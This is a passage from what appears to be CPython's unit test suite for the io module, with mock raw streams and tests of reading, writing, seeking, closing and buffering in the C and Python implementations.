"""Unit tests for the io module.""" # Tests of io are scattered over the test suite: # * test_bufio - tests file buffering # * test_memoryio - tests BytesIO and StringIO # * test_fileio - tests FileIO # * test_file - tests the file interface # * test_io - tests everything else in the io module # * test_univnewlines - tests universal newline support # * test_largefile - tests operations on a file greater than 2**32 bytes # (only enabled with -ulargefile) ################################################################################ # ATTENTION TEST WRITERS!!! ################################################################################ # When writing tests for io, it's important to test both the C and Python # implementations. This is usually done by writing a base test that refers to # the type it is testing as an attribute. Then it provides custom subclasses to # test both implementations. This file has lots of examples. ################################################################################ import abc import array import errno import locale import os import pickle import random import signal import sys import sysconfig import textwrap import threading import time import unittest import warnings import weakref from collections import deque, UserList from itertools import cycle, count from test import support from test.support.script_helper import ( assert_python_ok, assert_python_failure, run_python_until_end) from test.support import import_helper from test.support import os_helper from test.support import threading_helper from test.support import warnings_helper from test.support.os_helper import FakePath import codecs import io # C implementation of io import _pyio as pyio # Python implementation of io try: import ctypes except ImportError: def byteslike(*pos, **kw): return array.array("b", bytes(*pos, **kw)) else: def byteslike(*pos, **kw): """Create a bytes-like object having no string or sequence methods""" data = bytes(*pos, **kw) obj = 
EmptyStruct() ctypes.resize(obj, len(data)) memoryview(obj).cast("B")[:] = data return obj class EmptyStruct(ctypes.Structure): pass _cflags = sysconfig.get_config_var('CFLAGS') or '' _config_args = sysconfig.get_config_var('CONFIG_ARGS') or '' MEMORY_SANITIZER = ( '-fsanitize=memory' in _cflags or '--with-memory-sanitizer' in _config_args ) # Does io.IOBase finalizer log the exception if the close() method fails? # The exception is ignored silently by default in release build. IOBASE_EMITS_UNRAISABLE = (hasattr(sys, "gettotalrefcount") or sys.flags.dev_mode) def _default_chunk_size(): """Get the default TextIOWrapper chunk size""" with open(__file__, "r", encoding="latin-1") as f: return f._CHUNK_SIZE class MockRawIOWithoutRead: """A RawIO implementation without read(), so as to exercise the default RawIO.read() which calls readinto().""" def __init__(self, read_stack=()): self._read_stack = list(read_stack) self._write_stack = [] self._reads = 0 self._extraneous_reads = 0 def write(self, b): self._write_stack.append(bytes(b)) return len(b) def writable(self): return True def fileno(self): return 42 def readable(self): return True def seekable(self): return True def seek(self, pos, whence): return 0 # wrong but we gotta return something def tell(self): return 0 # same comment as above def readinto(self, buf): self._reads += 1 max_len = len(buf) try: data = self._read_stack[0] except IndexError: self._extraneous_reads += 1 return 0 if data is None: del self._read_stack[0] return None n = len(data) if len(data) <= max_len: del self._read_stack[0] buf[:n] = data return n else: buf[:] = data[:max_len] self._read_stack[0] = data[max_len:] return max_len def truncate(self, pos=None): return pos class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase): pass class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase): pass class MockRawIO(MockRawIOWithoutRead): def read(self, n=None): self._reads += 1 try: return self._read_stack.pop(0) except: 
self._extraneous_reads += 1 return b"" class CMockRawIO(MockRawIO, io.RawIOBase): pass class PyMockRawIO(MockRawIO, pyio.RawIOBase): pass class MisbehavedRawIO(MockRawIO): def write(self, b): return super().write(b) * 2 def read(self, n=None): return super().read(n) * 2 def seek(self, pos, whence): return -123 def tell(self): return -456 def readinto(self, buf): super().readinto(buf) return len(buf) * 5 class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase): pass class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase): pass class SlowFlushRawIO(MockRawIO): def __init__(self): super().__init__() self.in_flush = threading.Event() def flush(self): self.in_flush.set() time.sleep(0.25) class CSlowFlushRawIO(SlowFlushRawIO, io.RawIOBase): pass class PySlowFlushRawIO(SlowFlushRawIO, pyio.RawIOBase): pass class CloseFailureIO(MockRawIO): closed = 0 def close(self): if not self.closed: self.closed = 1 raise OSError class CCloseFailureIO(CloseFailureIO, io.RawIOBase): pass class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase): pass class MockFileIO: def __init__(self, data): self.read_history = [] super().__init__(data) def read(self, n=None): res = super().read(n) self.read_history.append(None if res is None else len(res)) return res def readinto(self, b): res = super().readinto(b) self.read_history.append(res) return res class CMockFileIO(MockFileIO, io.BytesIO): pass class PyMockFileIO(MockFileIO, pyio.BytesIO): pass class MockUnseekableIO: def seekable(self): return False def seek(self, *args): raise self.UnsupportedOperation("not seekable") def tell(self, *args): raise self.UnsupportedOperation("not seekable") def truncate(self, *args): raise self.UnsupportedOperation("not seekable") class CMockUnseekableIO(MockUnseekableIO, io.BytesIO): UnsupportedOperation = io.UnsupportedOperation class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO): UnsupportedOperation = pyio.UnsupportedOperation class MockNonBlockWriterIO: def __init__(self): self._write_stack = [] 
self._blocker_char = None def pop_written(self): s = b"".join(self._write_stack) self._write_stack[:] = [] return s def block_on(self, char): """Block when a given char is encountered.""" self._blocker_char = char def readable(self): return True def seekable(self): return True def seek(self, pos, whence=0): # naive implementation, enough for tests return 0 def writable(self): return True def write(self, b): b = bytes(b) n = -1 if self._blocker_char: try: n = b.index(self._blocker_char) except ValueError: pass else: if n > 0: # write data up to the first blocker self._write_stack.append(b[:n]) return n else: # cancel blocker and indicate would block self._blocker_char = None return None self._write_stack.append(b) return len(b) class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase): BlockingIOError = io.BlockingIOError class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase): BlockingIOError = pyio.BlockingIOError class IOTest(unittest.TestCase): def setUp(self): os_helper.unlink(os_helper.TESTFN) def tearDown(self): os_helper.unlink(os_helper.TESTFN) def write_ops(self, f): self.assertEqual(f.write(b"blah."), 5) f.truncate(0) self.assertEqual(f.tell(), 5) f.seek(0) self.assertEqual(f.write(b"blah."), 5) self.assertEqual(f.seek(0), 0) self.assertEqual(f.write(b"Hello."), 6) self.assertEqual(f.tell(), 6) self.assertEqual(f.seek(-1, 1), 5) self.assertEqual(f.tell(), 5) buffer = bytearray(b" world\n\n\n") self.assertEqual(f.write(buffer), 9) buffer[:] = b"*" * 9 # Overwrite our copy of the data self.assertEqual(f.seek(0), 0) self.assertEqual(f.write(b"h"), 1) self.assertEqual(f.seek(-1, 2), 13) self.assertEqual(f.tell(), 13) self.assertEqual(f.truncate(12), 12) self.assertEqual(f.tell(), 13) self.assertRaises(TypeError, f.seek, 0.0) def read_ops(self, f, buffered=False): data = f.read(5) self.assertEqual(data, b"hello") data = byteslike(data) self.assertEqual(f.readinto(data), 5) self.assertEqual(bytes(data), b" worl") data = bytearray(5) 
self.assertEqual(f.readinto(data), 2) self.assertEqual(len(data), 5) self.assertEqual(data[:2], b"d\n") self.assertEqual(f.seek(0), 0) self.assertEqual(f.read(20), b"hello world\n") self.assertEqual(f.read(1), b"") self.assertEqual(f.readinto(byteslike(b"x")), 0) self.assertEqual(f.seek(-6, 2), 6) self.assertEqual(f.read(5), b"world") self.assertEqual(f.read(0), b"") self.assertEqual(f.readinto(byteslike()), 0) self.assertEqual(f.seek(-6, 1), 5) self.assertEqual(f.read(5), b" worl") self.assertEqual(f.tell(), 10) self.assertRaises(TypeError, f.seek, 0.0) if buffered: f.seek(0) self.assertEqual(f.read(), b"hello world\n") f.seek(6) self.assertEqual(f.read(), b"world\n") self.assertEqual(f.read(), b"") f.seek(0) data = byteslike(5) self.assertEqual(f.readinto1(data), 5) self.assertEqual(bytes(data), b"hello") LARGE = 2**31 def large_file_ops(self, f): assert f.readable() assert f.writable() try: self.assertEqual(f.seek(self.LARGE), self.LARGE) except (OverflowError, ValueError): self.skipTest("no largefile support") self.assertEqual(f.tell(), self.LARGE) self.assertEqual(f.write(b"xxx"), 3) self.assertEqual(f.tell(), self.LARGE + 3) self.assertEqual(f.seek(-1, 1), self.LARGE + 2) self.assertEqual(f.truncate(), self.LARGE + 2) self.assertEqual(f.tell(), self.LARGE + 2) self.assertEqual(f.seek(0, 2), self.LARGE + 2) self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1) self.assertEqual(f.tell(), self.LARGE + 2) self.assertEqual(f.seek(0, 2), self.LARGE + 1) self.assertEqual(f.seek(-1, 2), self.LARGE) self.assertEqual(f.read(2), b"x") def test_invalid_operations(self): # Try writing on a file opened in read mode and vice-versa. 
exc = self.UnsupportedOperation for mode in ("w", "wb"): with self.open(os_helper.TESTFN, mode) as fp: self.assertRaises(exc, fp.read) self.assertRaises(exc, fp.readline) with self.open(os_helper.TESTFN, "wb", buffering=0) as fp: self.assertRaises(exc, fp.read) self.assertRaises(exc, fp.readline) with self.open(os_helper.TESTFN, "rb", buffering=0) as fp: self.assertRaises(exc, fp.write, b"blah") self.assertRaises(exc, fp.writelines, [b"blah\n"]) with self.open(os_helper.TESTFN, "rb") as fp: self.assertRaises(exc, fp.write, b"blah") self.assertRaises(exc, fp.writelines, [b"blah\n"]) with self.open(os_helper.TESTFN, "r") as fp: self.assertRaises(exc, fp.write, "blah") self.assertRaises(exc, fp.writelines, ["blah\n"]) # Non-zero seeking from current or end pos self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR) self.assertRaises(exc, fp.seek, -1, self.SEEK_END) def test_optional_abilities(self): # Test for OSError when optional APIs are not supported # The purpose of this test is to try fileno(), reading, writing and # seeking operations with various objects that indicate they do not # support these operations. 
        # Factory helpers: each returns a stream object advertising a known
        # subset of abilities ("f" = has fileno, "r" = readable,
        # "w" = writable, "s" = seekable).
        def pipe_reader():
            # Read end of a pipe: has a fileno, readable, not seekable.
            [r, w] = os.pipe()
            os.close(w)  # So that read() is harmless
            return self.FileIO(r, "r")

        def pipe_writer():
            # Write end of a pipe: has a fileno, writable, not seekable.
            [r, w] = os.pipe()
            self.addCleanup(os.close, r)
            # Guarantee that we can write into the pipe without blocking
            thread = threading.Thread(target=os.read, args=(r, 100))
            thread.start()
            self.addCleanup(thread.join)
            return self.FileIO(w, "w")

        def buffered_reader():
            return self.BufferedReader(self.MockUnseekableIO())

        def buffered_writer():
            return self.BufferedWriter(self.MockUnseekableIO())

        def buffered_random():
            return self.BufferedRandom(self.BytesIO())

        def buffered_rw_pair():
            return self.BufferedRWPair(self.MockUnseekableIO(),
                                       self.MockUnseekableIO())

        def text_reader():
            # Wrap an unseekable raw object that only supports writing, so
            # the TextIOWrapper is read-only from the caller's perspective.
            class UnseekableReader(self.MockUnseekableIO):
                writable = self.BufferedIOBase.writable
                write = self.BufferedIOBase.write
            return self.TextIOWrapper(UnseekableReader(), "ascii")

        def text_writer():
            class UnseekableWriter(self.MockUnseekableIO):
                readable = self.BufferedIOBase.readable
                read = self.BufferedIOBase.read
            return self.TextIOWrapper(UnseekableWriter(), "ascii")

        # (factory, abilities) pairs driving the checks below.
        tests = (
            (pipe_reader, "fr"), (pipe_writer, "fw"),
            (buffered_reader, "r"), (buffered_writer, "w"),
            (buffered_random, "rws"), (buffered_rw_pair, "rw"),
            (text_reader, "r"), (text_writer, "w"),
            (self.BytesIO, "rws"), (self.StringIO, "rws"),
        )
        for [test, abilities] in tests:
            with self.subTest(test), test() as obj:
                readable = "r" in abilities
                self.assertEqual(obj.readable(), readable)
                writable = "w" in abilities
                self.assertEqual(obj.writable(), writable)

                # Pick str vs bytes payload based on the stream layer.
                if isinstance(obj, self.TextIOBase):
                    data = "3"
                elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)):
                    data = b"3"
                else:
                    self.fail("Unknown base class")

                if "f" in abilities:
                    obj.fileno()
                else:
                    self.assertRaises(OSError, obj.fileno)

                if readable:
                    obj.read(1)
                    obj.read()
                else:
                    self.assertRaises(OSError, obj.read, 1)
                    self.assertRaises(OSError, obj.read)

                if writable:
                    obj.write(data)
                else:
                    self.assertRaises(OSError, obj.write, data)

                if sys.platform.startswith("win") and
test in ( pipe_reader, pipe_writer): # Pipes seem to appear as seekable on Windows continue seekable = "s" in abilities self.assertEqual(obj.seekable(), seekable) if seekable: obj.tell() obj.seek(0) else: self.assertRaises(OSError, obj.tell) self.assertRaises(OSError, obj.seek, 0) if writable and seekable: obj.truncate() obj.truncate(0) else: self.assertRaises(OSError, obj.truncate) self.assertRaises(OSError, obj.truncate, 0) def test_open_handles_NUL_chars(self): fn_with_NUL = 'foo\0bar' self.assertRaises(ValueError, self.open, fn_with_NUL, 'w') bytes_fn = bytes(fn_with_NUL, 'ascii') with warnings.catch_warnings(): warnings.simplefilter("ignore", DeprecationWarning) self.assertRaises(ValueError, self.open, bytes_fn, 'w') def test_raw_file_io(self): with self.open(os_helper.TESTFN, "wb", buffering=0) as f: self.assertEqual(f.readable(), False) self.assertEqual(f.writable(), True) self.assertEqual(f.seekable(), True) self.write_ops(f) with self.open(os_helper.TESTFN, "rb", buffering=0) as f: self.assertEqual(f.readable(), True) self.assertEqual(f.writable(), False) self.assertEqual(f.seekable(), True) self.read_ops(f) def test_buffered_file_io(self): with self.open(os_helper.TESTFN, "wb") as f: self.assertEqual(f.readable(), False) self.assertEqual(f.writable(), True) self.assertEqual(f.seekable(), True) self.write_ops(f) with self.open(os_helper.TESTFN, "rb") as f: self.assertEqual(f.readable(), True) self.assertEqual(f.writable(), False) self.assertEqual(f.seekable(), True) self.read_ops(f, True) def test_readline(self): with self.open(os_helper.TESTFN, "wb") as f: f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line") with self.open(os_helper.TESTFN, "rb") as f: self.assertEqual(f.readline(), b"abc\n") self.assertEqual(f.readline(10), b"def\n") self.assertEqual(f.readline(2), b"xy") self.assertEqual(f.readline(4), b"zzy\n") self.assertEqual(f.readline(), b"foo\x00bar\n") self.assertEqual(f.readline(None), b"another line") self.assertRaises(TypeError, f.readline, 
5.3) with self.open(os_helper.TESTFN, "r") as f: self.assertRaises(TypeError, f.readline, 5.3) def test_readline_nonsizeable(self): # Issue #30061 # Crash when readline() returns an object without __len__ class R(self.IOBase): def readline(self): return None self.assertRaises((TypeError, StopIteration), next, R()) def test_next_nonsizeable(self): # Issue #30061 # Crash when __next__() returns an object without __len__ class R(self.IOBase): def __next__(self): return None self.assertRaises(TypeError, R().readlines, 1) def test_raw_bytes_io(self): f = self.BytesIO() self.write_ops(f) data = f.getvalue() self.assertEqual(data, b"hello world\n") f = self.BytesIO(data) self.read_ops(f, True) def test_large_file_ops(self): # On Windows and Mac OSX this test consumes large resources; It takes # a long time to build the >2 GiB file and takes >2 GiB of disk space # therefore the resource must be enabled to run this test. if sys.platform[:3] == 'win' or sys.platform == 'darwin': support.requires( 'largefile', 'test requires %s bytes and a long time to run' % self.LARGE) with self.open(os_helper.TESTFN, "w+b", 0) as f: self.large_file_ops(f) with self.open(os_helper.TESTFN, "w+b") as f: self.large_file_ops(f) def test_with_open(self): for bufsize in (0, 100): f = None with self.open(os_helper.TESTFN, "wb", bufsize) as f: f.write(b"xxx") self.assertEqual(f.closed, True) f = None try: with self.open(os_helper.TESTFN, "wb", bufsize) as f: 1/0 except ZeroDivisionError: self.assertEqual(f.closed, True) else: self.fail("1/0 didn't raise an exception") # issue 5008 def test_append_mode_tell(self): with self.open(os_helper.TESTFN, "wb") as f: f.write(b"xxx") with self.open(os_helper.TESTFN, "ab", buffering=0) as f: self.assertEqual(f.tell(), 3) with self.open(os_helper.TESTFN, "ab") as f: self.assertEqual(f.tell(), 3) with self.open(os_helper.TESTFN, "a") as f: self.assertGreater(f.tell(), 0) def test_destructor(self): record = [] class MyFileIO(self.FileIO): def __del__(self): 
record.append(1) try: f = super().__del__ except AttributeError: pass else: f() def close(self): record.append(2) super().close() def flush(self): record.append(3) super().flush() with warnings_helper.check_warnings(('', ResourceWarning)): f = MyFileIO(os_helper.TESTFN, "wb") f.write(b"xxx") del f support.gc_collect() self.assertEqual(record, [1, 2, 3]) with self.open(os_helper.TESTFN, "rb") as f: self.assertEqual(f.read(), b"xxx") def _check_base_destructor(self, base): record = [] class MyIO(base): def __init__(self): # This exercises the availability of attributes on object # destruction. # (in the C version, close() is called by the tp_dealloc # function, not by __del__) self.on_del = 1 self.on_close = 2 self.on_flush = 3 def __del__(self): record.append(self.on_del) try: f = super().__del__ except AttributeError: pass else: f() def close(self): record.append(self.on_close) super().close() def flush(self): record.append(self.on_flush) super().flush() f = MyIO() del f support.gc_collect() self.assertEqual(record, [1, 2, 3]) def test_IOBase_destructor(self): self._check_base_destructor(self.IOBase) def test_RawIOBase_destructor(self): self._check_base_destructor(self.RawIOBase) def test_BufferedIOBase_destructor(self): self._check_base_destructor(self.BufferedIOBase) def test_TextIOBase_destructor(self): self._check_base_destructor(self.TextIOBase) def test_close_flushes(self): with self.open(os_helper.TESTFN, "wb") as f: f.write(b"xxx") with self.open(os_helper.TESTFN, "rb") as f: self.assertEqual(f.read(), b"xxx") def test_array_writes(self): a = array.array('i', range(10)) n = len(a.tobytes()) def check(f): with f: self.assertEqual(f.write(a), n) f.writelines((a,)) check(self.BytesIO()) check(self.FileIO(os_helper.TESTFN, "w")) check(self.BufferedWriter(self.MockRawIO())) check(self.BufferedRandom(self.MockRawIO())) check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())) def test_closefd(self): self.assertRaises(ValueError, self.open, os_helper.TESTFN, 
'w', closefd=False) def test_read_closed(self): with self.open(os_helper.TESTFN, "w") as f: f.write("egg\n") with self.open(os_helper.TESTFN, "r") as f: file = self.open(f.fileno(), "r", closefd=False) self.assertEqual(file.read(), "egg\n") file.seek(0) file.close() self.assertRaises(ValueError, file.read) with self.open(os_helper.TESTFN, "rb") as f: file = self.open(f.fileno(), "rb", closefd=False) self.assertEqual(file.read()[:3], b"egg") file.close() self.assertRaises(ValueError, file.readinto, bytearray(1)) def test_no_closefd_with_filename(self): # can't use closefd in combination with a file name self.assertRaises(ValueError, self.open, os_helper.TESTFN, "r", closefd=False) def test_closefd_attr(self): with self.open(os_helper.TESTFN, "wb") as f: f.write(b"egg\n") with self.open(os_helper.TESTFN, "r") as f: self.assertEqual(f.buffer.raw.closefd, True) file = self.open(f.fileno(), "r", closefd=False) self.assertEqual(file.buffer.raw.closefd, False) def test_garbage_collection(self): # FileIO objects are collected, and collecting them flushes # all data to disk. with warnings_helper.check_warnings(('', ResourceWarning)): f = self.FileIO(os_helper.TESTFN, "wb") f.write(b"abcxxx") f.f = f wr = weakref.ref(f) del f support.gc_collect() self.assertIsNone(wr(), wr) with self.open(os_helper.TESTFN, "rb") as f: self.assertEqual(f.read(), b"abcxxx") def test_unbounded_file(self): # Issue #1174606: reading from an unbounded stream such as /dev/zero. 
zero = "/dev/zero" if not os.path.exists(zero): self.skipTest("{0} does not exist".format(zero)) if sys.maxsize > 0x7FFFFFFF: self.skipTest("test can only run in a 32-bit address space") if support.real_max_memuse < support._2G: self.skipTest("test requires at least 2 GiB of memory") with self.open(zero, "rb", buffering=0) as f: self.assertRaises(OverflowError, f.read) with self.open(zero, "rb") as f: self.assertRaises(OverflowError, f.read) with self.open(zero, "r") as f: self.assertRaises(OverflowError, f.read) def check_flush_error_on_close(self, *args, **kwargs): # Test that the file is closed despite failed flush # and that flush() is called before file closed. f = self.open(*args, **kwargs) closed = [] def bad_flush(): closed[:] = [f.closed] raise OSError() f.flush = bad_flush self.assertRaises(OSError, f.close) # exception not swallowed self.assertTrue(f.closed) self.assertTrue(closed) # flush() called self.assertFalse(closed[0]) # flush() called before file closed f.flush = lambda: None # break reference loop def test_flush_error_on_close(self): # raw file # Issue #5700: io.FileIO calls flush() after file closed self.check_flush_error_on_close(os_helper.TESTFN, 'wb', buffering=0) fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'wb', buffering=0) fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False) os.close(fd) # buffered io self.check_flush_error_on_close(os_helper.TESTFN, 'wb') fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'wb') fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'wb', closefd=False) os.close(fd) # text io self.check_flush_error_on_close(os_helper.TESTFN, 'w') fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'w') fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 
'w', closefd=False) os.close(fd) def test_multi_close(self): f = self.open(os_helper.TESTFN, "wb", buffering=0) f.close() f.close() f.close() self.assertRaises(ValueError, f.flush) def test_RawIOBase_read(self): # Exercise the default limited RawIOBase.read(n) implementation (which # calls readinto() internally). rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None)) self.assertEqual(rawio.read(2), b"ab") self.assertEqual(rawio.read(2), b"c") self.assertEqual(rawio.read(2), b"d") self.assertEqual(rawio.read(2), None) self.assertEqual(rawio.read(2), b"ef") self.assertEqual(rawio.read(2), b"g") self.assertEqual(rawio.read(2), None) self.assertEqual(rawio.read(2), b"") def test_types_have_dict(self): test = ( self.IOBase(), self.RawIOBase(), self.TextIOBase(), self.StringIO(), self.BytesIO() ) for obj in test: self.assertTrue(hasattr(obj, "__dict__")) def test_opener(self): with self.open(os_helper.TESTFN, "w") as f: f.write("egg\n") fd = os.open(os_helper.TESTFN, os.O_RDONLY) def opener(path, flags): return fd with self.open("non-existent", "r", opener=opener) as f: self.assertEqual(f.read(), "egg\n") def test_bad_opener_negative_1(self): # Issue #27066. def badopener(fname, flags): return -1 with self.assertRaises(ValueError) as cm: open('non-existent', 'r', opener=badopener) self.assertEqual(str(cm.exception), 'opener returned -1') def test_bad_opener_other_negative(self): # Issue #27066. 
def badopener(fname, flags): return -2 with self.assertRaises(ValueError) as cm: open('non-existent', 'r', opener=badopener) self.assertEqual(str(cm.exception), 'opener returned -2') def test_fileio_closefd(self): # Issue #4841 with self.open(__file__, 'rb') as f1, \ self.open(__file__, 'rb') as f2: fileio = self.FileIO(f1.fileno(), closefd=False) # .__init__() must not close f1 fileio.__init__(f2.fileno(), closefd=False) f1.readline() # .close() must not close f2 fileio.close() f2.readline() def test_nonbuffered_textio(self): with warnings_helper.check_no_resource_warning(self): with self.assertRaises(ValueError): self.open(os_helper.TESTFN, 'w', buffering=0) def test_invalid_newline(self): with warnings_helper.check_no_resource_warning(self): with self.assertRaises(ValueError): self.open(os_helper.TESTFN, 'w', newline='invalid') def test_buffered_readinto_mixin(self): # Test the implementation provided by BufferedIOBase class Stream(self.BufferedIOBase): def read(self, size): return b"12345" read1 = read stream = Stream() for method in ("readinto", "readinto1"): with self.subTest(method): buffer = byteslike(5) self.assertEqual(getattr(stream, method)(buffer), 5) self.assertEqual(bytes(buffer), b"12345") def test_fspath_support(self): def check_path_succeeds(path): with self.open(path, "w") as f: f.write("egg\n") with self.open(path, "r") as f: self.assertEqual(f.read(), "egg\n") check_path_succeeds(FakePath(os_helper.TESTFN)) check_path_succeeds(FakePath(os.fsencode(os_helper.TESTFN))) with self.open(os_helper.TESTFN, "w") as f: bad_path = FakePath(f.fileno()) with self.assertRaises(TypeError): self.open(bad_path, 'w') bad_path = FakePath(None) with self.assertRaises(TypeError): self.open(bad_path, 'w') bad_path = FakePath(FloatingPointError) with self.assertRaises(FloatingPointError): self.open(bad_path, 'w') # ensure that refcounting is correct with some error conditions with self.assertRaisesRegex(ValueError, 'read/write/append mode'): 
self.open(FakePath(os_helper.TESTFN), 'rwxa') def test_RawIOBase_readall(self): # Exercise the default unlimited RawIOBase.read() and readall() # implementations. rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg")) self.assertEqual(rawio.read(), b"abcdefg") rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg")) self.assertEqual(rawio.readall(), b"abcdefg") def test_BufferedIOBase_readinto(self): # Exercise the default BufferedIOBase.readinto() and readinto1() # implementations (which call read() or read1() internally). class Reader(self.BufferedIOBase): def __init__(self, avail): self.avail = avail def read(self, size): result = self.avail[:size] self.avail = self.avail[size:] return result def read1(self, size): """Returns no more than 5 bytes at once""" return self.read(min(size, 5)) tests = ( # (test method, total data available, read buffer size, expected # read size) ("readinto", 10, 5, 5), ("readinto", 10, 6, 6), # More than read1() can return ("readinto", 5, 6, 5), # Buffer larger than total available ("readinto", 6, 7, 6), ("readinto", 10, 0, 0), # Empty buffer ("readinto1", 10, 5, 5), # Result limited to single read1() call ("readinto1", 10, 6, 5), # Buffer larger than read1() can return ("readinto1", 5, 6, 5), # Buffer larger than total available ("readinto1", 6, 7, 5), ("readinto1", 10, 0, 0), # Empty buffer ) UNUSED_BYTE = 0x81 for test in tests: with self.subTest(test): method, avail, request, result = test reader = Reader(bytes(range(avail))) buffer = bytearray((UNUSED_BYTE,) * request) method = getattr(reader, method) self.assertEqual(method(buffer), result) self.assertEqual(len(buffer), request) self.assertSequenceEqual(buffer[:result], range(result)) unused = (UNUSED_BYTE,) * (request - result) self.assertSequenceEqual(buffer[result:], unused) self.assertEqual(len(reader.avail), avail - result) def test_close_assert(self): class R(self.IOBase): def __setattr__(self, name, value): pass def flush(self): raise OSError() f = R() # This would 
cause an assertion failure. self.assertRaises(OSError, f.close) # Silence destructor error R.flush = lambda self: None class CIOTest(IOTest): def test_IOBase_finalize(self): # Issue #12149: segmentation fault on _PyIOBase_finalize when both a # class which inherits IOBase and an object of this class are caught # in a reference cycle and close() is already in the method cache. class MyIO(self.IOBase): def close(self): pass # create an instance to populate the method cache MyIO() obj = MyIO() obj.obj = obj wr = weakref.ref(obj) del MyIO del obj support.gc_collect() self.assertIsNone(wr(), wr) class PyIOTest(IOTest): pass @support.cpython_only class APIMismatchTest(unittest.TestCase): def test_RawIOBase_io_in_pyio_match(self): """Test that pyio RawIOBase class has all c RawIOBase methods""" mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase, ignore=('__weakref__',)) self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods') def test_RawIOBase_pyio_in_io_match(self): """Test that c RawIOBase class has all pyio RawIOBase methods""" mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase) self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods') class CommonBufferedTests: # Tests common to BufferedReader, BufferedWriter and BufferedRandom def test_detach(self): raw = self.MockRawIO() buf = self.tp(raw) self.assertIs(buf.detach(), raw) self.assertRaises(ValueError, buf.detach) repr(buf) # Should still work def test_fileno(self): rawio = self.MockRawIO() bufio = self.tp(rawio) self.assertEqual(42, bufio.fileno()) def test_invalid_args(self): rawio = self.MockRawIO() bufio = self.tp(rawio) # Invalid whence self.assertRaises(ValueError, bufio.seek, 0, -1) self.assertRaises(ValueError, bufio.seek, 0, 9) def test_override_destructor(self): tp = self.tp record = [] class MyBufferedIO(tp): def __del__(self): record.append(1) try: f = super().__del__ except AttributeError: pass 
else: f() def close(self): record.append(2) super().close() def flush(self): record.append(3) super().flush() rawio = self.MockRawIO() bufio = MyBufferedIO(rawio) del bufio support.gc_collect() self.assertEqual(record, [1, 2, 3]) def test_context_manager(self): # Test usability as a context manager rawio = self.MockRawIO() bufio = self.tp(rawio) def _with(): with bufio: pass _with() # bufio should now be closed, and using it a second time should raise # a ValueError. self.assertRaises(ValueError, _with) def test_error_through_destructor(self): # Test that the exception state is not modified by a destructor, # even if close() fails. rawio = self.CloseFailureIO() with support.catch_unraisable_exception() as cm: with self.assertRaises(AttributeError): self.tp(rawio).xyzzy if not IOBASE_EMITS_UNRAISABLE: self.assertIsNone(cm.unraisable) elif cm.unraisable is not None: self.assertEqual(cm.unraisable.exc_type, OSError) def test_repr(self): raw = self.MockRawIO() b = self.tp(raw) clsname = r"(%s\.)?%s" % (self.tp.__module__, self.tp.__qualname__) self.assertRegex(repr(b), "<%s>" % clsname) raw.name = "dummy" self.assertRegex(repr(b), "<%s name='dummy'>" % clsname) raw.name = b"dummy" self.assertRegex(repr(b), "<%s name=b'dummy'>" % clsname) def test_recursive_repr(self): # Issue #25455 raw = self.MockRawIO() b = self.tp(raw) with support.swap_attr(raw, 'name', b): try: repr(b) # Should not crash except RuntimeError: pass def test_flush_error_on_close(self): # Test that buffered file is closed despite failed flush # and that flush() is called before file closed. 
        raw = self.MockRawIO()
        closed = []
        def bad_flush():
            # Record closed-ness of both layers at the moment flush() runs.
            closed[:] = [b.closed, raw.closed]
            raise OSError()
        raw.flush = bad_flush
        b = self.tp(raw)
        self.assertRaises(OSError, b.close) # exception not swallowed
        self.assertTrue(b.closed)
        self.assertTrue(raw.closed)
        self.assertTrue(closed)      # flush() called
        self.assertFalse(closed[0])  # flush() called before file closed
        self.assertFalse(closed[1])
        raw.flush = lambda: None  # break reference loop

    def test_close_error_on_close(self):
        # When flush() and the raw close() both fail, close() must raise the
        # close() error with the flush() error chained as __context__.
        raw = self.MockRawIO()
        def bad_flush():
            raise OSError('flush')
        def bad_close():
            raise OSError('close')
        raw.close = bad_close
        b = self.tp(raw)
        b.flush = bad_flush
        with self.assertRaises(OSError) as err: # exception not swallowed
            b.close()
        self.assertEqual(err.exception.args, ('close',))
        self.assertIsInstance(err.exception.__context__, OSError)
        self.assertEqual(err.exception.__context__.args, ('flush',))
        self.assertFalse(b.closed)
        # Silence destructor error
        raw.close = lambda: None
        b.flush = lambda: None

    def test_nonnormalized_close_error_on_close(self):
        # Issue #21677: same chaining must hold for not-yet-normalized
        # exceptions (here NameErrors raised from undefined names).
        raw = self.MockRawIO()
        def bad_flush():
            raise non_existing_flush
        def bad_close():
            raise non_existing_close
        raw.close = bad_close
        b = self.tp(raw)
        b.flush = bad_flush
        with self.assertRaises(NameError) as err: # exception not swallowed
            b.close()
        self.assertIn('non_existing_close', str(err.exception))
        self.assertIsInstance(err.exception.__context__, NameError)
        self.assertIn('non_existing_flush', str(err.exception.__context__))
        self.assertFalse(b.closed)
